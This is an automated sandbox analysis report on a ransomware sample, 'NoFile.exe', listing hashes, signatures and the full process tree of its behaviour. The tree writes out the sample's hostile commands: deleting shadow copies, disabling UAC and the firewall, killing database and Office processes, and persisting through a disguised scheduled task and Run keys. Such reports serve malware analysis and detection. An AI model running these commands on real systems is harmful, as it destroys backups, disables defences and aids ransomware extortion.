Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

NoFile.exe

windows7_x64

10

NoFile.exe

windows10-2004_x64

10

Resubmissions

06/02/2022, 09:21

220206-lbgarshbe9 10

06/02/2022, 09:18

220206-k9rcyshcfn 10

Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    06/02/2022, 09:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NoFile.exe

  • Size

    2.2MB

  • MD5

    7d1ed67b77f47ba8aadf9a3ac7d0c371

  • SHA1

    a598e6708c189caeef1fa76064feb4d0155abb3d

  • SHA256

    87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae

  • SHA512

    17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9

Score
10/10
evasionpersistenceransomwaretrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 10 IoCs
    evasion
  • Enumerates processes with tasklist 1 TTPs 11 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 40 IoCs
    evasion
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NoFile.exe
    "C:\Users\Admin\AppData\Local\Temp\NoFile.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1604
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:808
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist /v /fo csv
        3⤵
        • Enumerates processes with tasklist
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:796
      • C:\Windows\SysWOW64\findstr.exe
        findstr /i "dcdcf"
        3⤵
          PID:1032
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ver
        2⤵
          PID:1796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1820
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:580
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
              4⤵
                PID:1624
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:832
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /v
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:632
                • C:\Windows\SysWOW64\find.exe
                  find /I /c "dcdcf"
                  5⤵
                    PID:1176
                  • C:\Windows\SysWOW64\vssadmin.exe
                    vssadmin.exe Delete Shadows /All /Quiet
                    5⤵
                    • Interacts with shadow copies
                    PID:1260
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 15 /nobreak
                    5⤵
                    • Delays execution with timeout.exe
                    PID:672
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist /fi "ImageName eq NoFile.exe" /fo csv
                    5⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1820
                  • C:\Windows\SysWOW64\find.exe
                    find /I "NoFile.exe"
                    5⤵
                      PID:1728
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 15 /nobreak
                      5⤵
                      • Delays execution with timeout.exe
                      PID:552
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist /fi "ImageName eq NoFile.exe" /fo csv
                      5⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1696
                    • C:\Windows\SysWOW64\find.exe
                      find /I "NoFile.exe"
                      5⤵
                        PID:1860
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 15 /nobreak
                        5⤵
                        • Delays execution with timeout.exe
                        PID:1740
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist /fi "ImageName eq NoFile.exe" /fo csv
                        5⤵
                        • Enumerates processes with tasklist
                        PID:1060
                      • C:\Windows\SysWOW64\find.exe
                        find /I "NoFile.exe"
                        5⤵
                          PID:1048
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 15 /nobreak
                          5⤵
                          • Delays execution with timeout.exe
                          PID:560
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist /fi "ImageName eq NoFile.exe" /fo csv
                          5⤵
                          • Enumerates processes with tasklist
                          PID:364
                        • C:\Windows\SysWOW64\find.exe
                          find /I "NoFile.exe"
                          5⤵
                            PID:2004
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 15 /nobreak
                            5⤵
                            • Delays execution with timeout.exe
                            PID:1780
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist /fi "ImageName eq NoFile.exe" /fo csv
                            5⤵
                            • Enumerates processes with tasklist
                            PID:968
                          • C:\Windows\SysWOW64\find.exe
                            find /I "NoFile.exe"
                            5⤵
                              PID:292
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 15 /nobreak
                              5⤵
                              • Delays execution with timeout.exe
                              PID:1708
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist /fi "ImageName eq NoFile.exe" /fo csv
                              5⤵
                              • Enumerates processes with tasklist
                              PID:1928
                            • C:\Windows\SysWOW64\find.exe
                              find /I "NoFile.exe"
                              5⤵
                                PID:1060
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 15 /nobreak
                                5⤵
                                • Delays execution with timeout.exe
                                PID:688
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist /fi "ImageName eq NoFile.exe" /fo csv
                                5⤵
                                • Enumerates processes with tasklist
                                PID:1396
                              • C:\Windows\SysWOW64\find.exe
                                find /I "NoFile.exe"
                                5⤵
                                  PID:580
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 15 /nobreak
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:1588
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist /fi "ImageName eq NoFile.exe" /fo csv
                                  5⤵
                                  • Enumerates processes with tasklist
                                  PID:972
                                • C:\Windows\SysWOW64\find.exe
                                  find /I "NoFile.exe"
                                  5⤵
                                    PID:840
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 15 /nobreak
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:968
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist /fi "ImageName eq NoFile.exe" /fo csv
                                    5⤵
                                    • Enumerates processes with tasklist
                                    PID:1872
                                  • C:\Windows\SysWOW64\find.exe
                                    find /I "NoFile.exe"
                                    5⤵
                                      PID:1360
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 15 /nobreak
                                      5⤵
                                      • Delays execution with timeout.exe
                                      PID:1656
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:268
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:560
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1876
                                • C:\Windows\SysWOW64\nslookup.exe
                                  nslookup myip.opendns.com. resolver1.opendns.com
                                  3⤵
                                    PID:1512
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                  2⤵
                                    PID:1924
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                    2⤵
                                      PID:1776
                                      • C:\Windows\SysWOW64\systeminfo.exe
                                        systeminfo
                                        3⤵
                                        • Gathers system information
                                        PID:964
                                      • C:\Windows\SysWOW64\find.exe
                                        find /i "os name"
                                        3⤵
                                          PID:2028
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                        2⤵
                                          PID:1612
                                          • C:\Windows\SysWOW64\systeminfo.exe
                                            systeminfo
                                            3⤵
                                            • Gathers system information
                                            PID:1160
                                          • C:\Windows\SysWOW64\find.exe
                                            find /i "original"
                                            3⤵
                                              PID:1540
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                            2⤵
                                              PID:556
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                3⤵
                                                • Modifies registry key
                                                PID:856
                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                vssadmin.exe Delete Shadows /All /Quiet
                                                3⤵
                                                • Interacts with shadow copies
                                                PID:772
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                wmic shadowcopy delete
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:460
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh advfirewall set currentprofile state off
                                                3⤵
                                                  PID:2020
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh firewall set opmode mode=disable
                                                  3⤵
                                                    PID:624
                                                  • C:\Windows\SysWOW64\netsh.exe
                                                    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                                    3⤵
                                                      PID:1524
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
                                                    2⤵
                                                      PID:1572
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im notepad.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1696
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im msftesql.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1708
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im sqlagent.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1740
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im sqlbrowser.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:316
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im sqlservr.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:820
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im sqlwriter.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:364
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im oracle.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1396
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im ocssd.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1364
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im dbsnmp.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2020
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im synctime.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1244
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im agntsvc.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1552
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im mydesktopqos.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:920
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im isqlplussvc.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:932
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im xfssvccon.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1272
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im mydesktopservice.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:560
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im ocautoupds.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1984
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im agntsvc.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:268
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im encsvc.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:292
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im firefoxconfig.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:964
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im tbirdconfig.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1044
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im ocomm.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1776
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im mysqld.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1612
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im mysqld-nt.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1728
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im mysqld-opt.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1664
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im dbeng50.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1060
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im sqbcoreservice.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1300
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im excel.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:460
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im infopath.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1924
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im msaccess.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:2028
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im mspub.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:624
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im onenote.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1524
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im outlook.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1520
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im powerpnt.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:864
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im steam.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1732
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im thebat.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1548
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im thebat64.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1272
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im thunderbird.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:688
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im visio.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:580
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im winword.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1780
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im wordpad.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1260
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                      2⤵
                                                        PID:1708
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                          3⤵
                                                            PID:1728
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                                                            3⤵
                                                            • Modifies registry key
                                                            PID:672
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                          2⤵
                                                            PID:564
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                              3⤵
                                                              • Adds Run key to start application
                                                              • Modifies registry key
                                                              PID:1732
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                                                              3⤵
                                                              • Adds Run key to start application
                                                              PID:1944
                                                        • C:\Windows\system32\vssvc.exe
                                                          C:\Windows\system32\vssvc.exe
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2008
                                                        • C:\Windows\system32\taskmgr.exe
                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                          1⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:796
                                                        • C:\Windows\explorer.exe
                                                          "C:\Windows\explorer.exe"
                                                          1⤵
                                                            PID:1916
                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
                                                            1⤵
                                                              PID:1060
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\ReadMe_Now!.hta"
                                                              1⤵
                                                                PID:1916

                                                              Network

                                                              MITRE ATT&CK Enterprise v6

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • memory/796-59-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/1604-53-0x0000000075531000-0x0000000075533000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download